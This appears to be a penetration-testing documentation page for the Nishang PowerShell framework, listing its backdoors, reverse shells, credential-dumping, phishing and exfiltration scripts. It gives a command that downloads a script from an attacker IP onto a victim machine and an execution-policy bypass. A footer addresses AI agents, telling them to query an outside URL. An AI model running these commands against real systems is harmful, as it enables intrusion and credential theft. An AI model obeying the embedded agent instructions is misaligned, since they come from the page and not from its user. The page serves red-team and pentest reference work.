# Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

**Link**: <https://github.com/samratashok/nishang>&#x20;

Also installed by default on Kali:&#x20;

```
root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility 
```

We will need to upload the nishang scripts into the victim computer:&#x20;

`powershell iwr -uri 10.10.14.14/{Nishang script}` &#x20;

Load the script:&#x20;

`powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1`&#x20;

## Scripts&#x20;

Nishang currently contains the following scripts and payloads.&#x20;

### ActiveDirectory&#x20;

* [Get-Unconstrained](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Get-Unconstrained.ps1) – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.&#x20;

### Antak – the Webshell&#x20;

* [Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell) – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.&#x20;

### Backdoors&#x20;

* [HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1) – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.&#x20;
* [DNS\_TXT\_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1) – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.&#x20;
* [Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1) – A backdoor which can execute PowerShell scripts at a given time on a target.&#x20;
* [Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1) – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.&#x20;
* [Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1) – A backdoor which can use Windows screen saver for remote command and script execution.&#x20;
* [Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1) – A backdoor which can use alternate data streams and Windows Registry to achieve persistence.&#x20;
* [Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1) – A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).&#x20;
* [Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1) – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.&#x20;
* [Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1) – Modify permissions of PowerShell remoting to allow access to a non-admin user.&#x20;

### Bypass&#x20;

* [Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1) – Implementation of publicly known methods to bypass/avoid AMSI.&#x20;

### Client&#x20;

* [Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) – Create infected CHM files which can execute PowerShell commands and scripts.&#x20;
* [Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1) – Create Word files and infect existing ones to run PowerShell commands and scripts.&#x20;
* [Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1) – Create Excel files and infect existing ones to run PowerShell commands and scripts.&#x20;
* [Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1) – Create a HTA file which can be deployed on a web server and used in phishing campaigns.&#x20;
* [Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1) – Create signed JAR files which can be used with applets for script and command execution.&#x20;
* [Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1) – Create shortcut files capable of executing PowerShell commands and scripts.&#x20;
* [Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1) – Create IQY files for phishing credentials and SMB hashes.&#x20;
* [Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1) – Create JS files capable of executing PowerShell commands and scripts.&#x20;
* [Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1) – Create SCT files capable of executing PowerShell commands and scripts.&#x20;
* [Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1) – Create a SCF file which can be used for capturing NTLM hash challenges.&#x20;

### Escalation&#x20;

* [Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1) – When SYSTEM privileges are required.&#x20;
* [Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1) – Introduce vulnerabilities by removing patches.&#x20;
* [Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1) – Bypass UAC.&#x20;

### Execution&#x20;

* [Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1) – Download and execute a PowerShell script in memory.&#x20;
* [Download\_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1) – Download an executable in text format, convert it to an executable, and execute.&#x20;
* [Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1) – Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.&#x20;
* [Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1) – Execute shellcode in memory using DNS TXT queries.&#x20;
* [Out-RundllCommand](https://github.com/samratashok/nishang/blob/master/Execution/Out-RundllCommand.ps1) – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.&#x20;

### Gather&#x20;

* [Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1) – Check for a virtual machine.&#x20;
* [Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1) – Copy the SAM file using Volume Shadow Copy Service.&#x20;
* [Invoke-CredentialsPhish](https://github.com/samratashok/nishang/blob/master/Gather/Credentials.ps1) – Trick a user into giving credentials in plain text.&#x20;
* [FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1) [FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1) – A pair of scripts for egress testing&#x20;
* [Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1) – Get juicy information from a target.&#x20;
* [Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1) – Get LSA Secret from a target.&#x20;
* [Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1) – Get password hashes from a target.&#x20;
* [Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1) – Get WLAN keys in plain text from a target.&#x20;
* [Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1) – Log keystrokes from a target.&#x20;
* [Invoke-MimikatzWdigestDowngrade](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1) – Dump user passwords in plain on Windows 8.1 and Server 2012&#x20;
* [Get-PassHints](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHints.ps1) – Get password hints of Windows users from a target.&#x20;
* [Show-TargetScreen](https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1) – Connect back and Stream target screen using MJPEG.&#x20;
* [Invoke-Mimikatz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1) – Load mimikatz in memory. Updated and with some customisation.&#x20;
* [Invoke-Mimikittenz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikittenz.ps1) – Extract juicy information from target process (like browsers) memory using regex.&#x20;
* [Invoke-SSIDExfil](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SSIDExfil.ps1) – Exfiltrate information like user credentials, using WLAN SSID.&#x20;
* [Invoke-SessionGopher](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SessionGopher.ps1) – Identify admin jump-boxes and/or computers used to access Unix machines.&#x20;

### MITM&#x20;

* [Invoke-Interceptor](https://github.com/samratashok/nishang/blob/master/MITM/Invoke-Interceptor.ps1) – A local HTTPS proxy for MITM attacks. =

### Pivot&#x20;

* [Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1) – Check credentials on multiple computers and create PSSessions.&#x20;
* [Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1)  – Copy and execute an executable on multiple machines.&#x20;
* [Invoke-NetworkRelay](https://github.com/samratashok/nishang/blob/master/Pivot/Invoke-NetworkRelay.ps1)  – Create network relays between computers.&#x20;

### Prasadhak&#x20;

* [Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1) – Check running hashes of running process against the VirusTotal database.&#x20;

### Scan&#x20;

* [Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1) – Brute force FTP, Active Directory, MSSQL, and Sharepoint.&#x20;
* [Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1) – A handy port scanner.&#x20;

### Powerpreter&#x20;

* [Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter) – All the functionality of nishang in a single script module.&#x20;

### Shells&#x20;

* [Invoke-PsGcat](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcat.ps1) – Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent&#x20;
* [Invoke-PsGcatAgent](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcatAgent.ps1) – Execute commands and scripts sent by Invoke-PsGcat.&#x20;
* [Invoke-PowerShellTcp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) – An interactive PowerShell reverse connect or bind shell&#x20;
* [Invoke-PowerShellTcpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1) – Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.&#x20;
* [Invoke-PowerShellTcpOneLineBind](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLineBind.ps1) – Bind version of Invoke-PowerShellTcpOneLine.&#x20;
* [Invoke-PowerShellUdp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdp.ps1) – An interactive PowerShell reverse connect or bind shell over UDP&#x20;
* [Invoke-PowerShellUdpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1) – Stripped down version of Invoke-PowerShellUdp.&#x20;
* [Invoke-PoshRatHttps](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1) – Reverse interactive PowerShell over HTTPS.&#x20;
* [Invoke-PoshRatHttp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttp.ps1) – Reverse interactive PowerShell over HTTP.&#x20;
* [Remove-PoshRat](https://github.com/samratashok/nishang/blob/master/Shells/Remove-PoshRat.ps1) – Clean the system after using Invoke-PoshRatHttps&#x20;
* [Invoke-PowerShellWmi](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellWmi.ps1) – Interactive PowerShell using WMI.&#x20;
* [Invoke-PowerShellIcmp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1) – An interactive PowerShell reverse shell over ICMP.&#x20;
* [Invoke-JSRatRundll](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRundll.ps1) – An interactive PowerShell reverse shell over HTTP using rundll32.exe.&#x20;
* [Invoke-JSRatRegsvr](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRegsvr.ps1) – An interactive PowerShell reverse shell over HTTP using regsvr32.exe.&#x20;

### Utility&#x20;

* [Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1) – Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.&#x20;
* [Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1) – Add reboot persistence capability to a script.&#x20;
* [Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1) – Remote persistence added by the Add-Persistence script.&#x20;
* [Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1) – Pipe (|) this to any script to exfiltrate the output.&#x20;
* [Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1) – Transfer a file to the target.&#x20;
* [Parse\_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1) – Parse keys logged by the keylogger.&#x20;
* [Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1) – Encode and compress a script or string.&#x20;
* [Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1) – Decode and decompress a script or string from Invoke-Encode.&#x20;
* [Start-CaptureServer](https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1) – Run a web server which logs Basic authentication and SMB hashes.&#x20;
* [ConvertTo-ROT13](https://github.com/samratashok/nishang/blob/master/Utility/ConvertTo-ROT13.ps1) – Encode a string to ROT13 or decode a ROT13 string.&#x20;
* [Out-DnsTxt](https://github.com/samratashok/nishang/blob/master/Utility/Out-DnsTxt.ps1) – Generate DNS TXT records which could be used with other scripts.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/tools/nishang.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.